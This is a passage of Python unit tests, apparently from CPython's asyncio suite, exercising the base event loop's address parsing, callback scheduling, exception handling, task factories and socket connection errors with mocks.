from test.support import socket_helper
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
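# mock.patch with new_callable passes the created mock as an extra positional
# argument, so tests decorated with @patch_socket receive the mocked socket
# module (named m_socket below).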
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
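        # _ipaddr_info() mimics a single getaddrinfo() result: a 5-tuple of
        # (family, type, proto, canonname, sockaddr), or None when the host
        # isn't a numeric IP literal it can resolve without blocking.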
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if socket_helper.IPV6_ENABLED:
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
        # operations are refused once the loop is closed
f = self.loop.create_future()
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_deprecation_warnings(self):
executor = mock.Mock()
with self.assertWarns(DeprecationWarning):
self.loop.set_default_executor(executor)
# Avoid cleaning up the executor mock
self.loop._default_executor = None
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = loop.create_future()
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
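        # h1 was cancelled, so the select() timeout should be driven by h2,
        # i.e. roughly 10 seconds from now.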
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
        # Add fewer cancelled handles than the threshold
        # (base_events._MIN_SCHEDULED_TIMER_HANDLES) and ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
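        # With CPython's values at the time of writing
        # (_MIN_SCHEDULED_TIMER_HANDLES = 100,
        # _MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5) this adds
        # ceil(100 * 0.5) + 1 = 51 cancelled handles and 49 live ones.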
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
        self.assertTrue(all(not x._cancelled for x in self.loop._scheduled))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = self.loop.create_future()
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
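# Debug-mode precedence exercised above, summarized: -X dev or a
# non-empty PYTHONASYNCIODEBUG enables debug mode, while -E makes the
# interpreter ignore PYTHON* environment variables, e.g. (hypothetical
# shell session):
#
#     PYTHONASYNCIODEBUG=1 python -c 'import asyncio; ...'      # True
#     PYTHONASYNCIODEBUG=1 python -E -c 'import asyncio; ...'   # False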
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so doesn't log
# a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-facto standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
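# A minimal sketch of the idiom under test, assuming test_utils.run_once()
# is implemented along these lines (an assumption, not a copy):
#
#     def run_once(loop):
#         loop.call_soon(loop.stop)  # queue a stop before the first iteration
#         loop.run_forever()         # runs one iteration, then returns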
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
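# How the chain above works: each iter_one() task advances the async
# generator by exactly one item, then schedules a successor task. After
# yielding 'THREE' no successor is scheduled, so the generator is left
# suspended inside its try block and only garbage collection (exercised
# by the two tests below) can run the finally clause.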
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.get_running_loop().create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = self.loop.create_future()
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
